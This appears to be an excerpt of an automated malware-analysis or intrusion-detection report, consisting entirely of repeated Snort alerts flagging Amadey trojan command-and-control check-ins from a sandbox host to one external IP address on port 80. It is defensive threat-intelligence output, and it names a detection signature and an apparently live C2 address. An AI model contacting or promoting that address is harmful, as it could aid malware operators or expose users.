                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49822 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49823 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49824 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49825 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49826 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49827 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49828 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49829 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49830 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49831 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49832 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49833 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49834 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49835 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49836 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49837 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49838 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49839 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49840 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49841 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49842 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49844 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49845 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49846 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49847 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49848 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49849 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49850 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49851 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49852 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49853 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49854 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49855 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49856 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49857 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49858 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49859 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49860 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49861 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49862 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49863 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49864 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49865 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49866 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49867 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49868 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49869 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49870 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49871 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49872 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49873 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49874 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49875 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49876 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49877 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49878 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49879 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49880 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49881 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49882 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49883 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49884 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49885 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49886 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49887 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49888 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49889 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49890 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49891 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49892 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49893 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49894 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49895 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49896 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49897 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49898 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49899 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49900 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49901 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49902 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49903 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49904 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49905 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49906 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49907 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49908 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49909 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49910 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49911 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49912 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49913 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49914 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49915 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49916 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49917 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49918 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49919 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49920 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49921 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49922 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49923 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49924 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49925 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49926 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49927 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49928 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49929 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49930 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49931 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49932 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49933 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49934 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49935 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49936 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49937 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49938 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49939 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49940 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49941 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49942 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49943 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49944 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49945 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49946 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49947 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49948 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49949 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49950 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49951 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49952 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49953 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49954 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49955 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49956 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49957 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49958 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49959 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49960 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49961 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49962 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49963 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49964 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49965 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49966 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49967 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49968 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49969 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49970 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49971 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49972 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49973 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49974 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49975 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49976 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49977 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49978 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49979 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49980 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49981 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49982 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49983 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49984 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49985 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49986 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49987 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49988 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49989 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49990 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49991 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49992 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49993 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49994 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49995 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49996 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49997 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49998 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49999 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50000 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50001 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50002 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50003 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50004 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50005 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50006 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50007 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50008 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50009 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50010 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50011 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50012 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50013 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50014 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50015 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50016 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50017 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50018 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50019 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50020 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50021 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50022 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50023 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50024 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50025 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50026 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50027 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50028 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50029 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50030 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50031 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50032 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50033 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50034 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50035 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50036 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50037 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50038 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50039 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50040 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50041 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50042 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50043 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50044 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50045 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50046 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50047 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50048 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50049 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50050 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50051 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50052 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50053 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50054 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50055 -> 62.204.41.4:80
